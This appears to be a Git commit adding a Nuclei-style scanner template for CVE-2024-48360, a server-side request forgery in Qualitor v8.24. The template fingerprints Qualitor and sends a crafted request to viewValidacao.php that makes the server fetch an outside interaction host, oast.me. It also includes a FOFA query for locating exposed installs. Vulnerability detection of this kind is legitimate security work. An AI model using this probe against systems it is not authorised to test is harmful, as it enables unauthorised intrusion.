Merge pull request #11129 from Kazgangap/CVE-2024-48360

add CVE-2024-48360
patch-13
Ritik Chaddha 2024-11-04 11:14:15 +05:30 committed by GitHub
commit f313e2ae4d
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 58 additions and 0 deletions

View File

@ -0,0 +1,58 @@
id: CVE-2024-48360
info:
name: Qualitor <= v8.24 - Server-Side Request Forgery
author: s4e-io
severity: high
description: |
Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php.
reference:
- https://github.com/OpenXP-Research/CVE-2024-48360
- https://packetstormsecurity.com/files/182427/Qualitor-8.24-Server-Side-Request-Forgery.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-48360
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-48360
cwe-id: CWE-918
epss-score: 0.00043
epss-percentile: 0.09945
metadata:
verified: true
max-request: 2
vendor: qualitor
product: qualitor
fofa-query: icon_hash="-1217039701"
tags: cve,cve2024,ssrf,qualitor
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "qualitor")'
- "status_code == 200"
condition: and
internal: true
- raw:
- |
GET /html/ad/adformmobile/request/viewValidacao.php?url=oast.me HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<h1> Interactsh Server </h1>"
- type: status
status:
- 200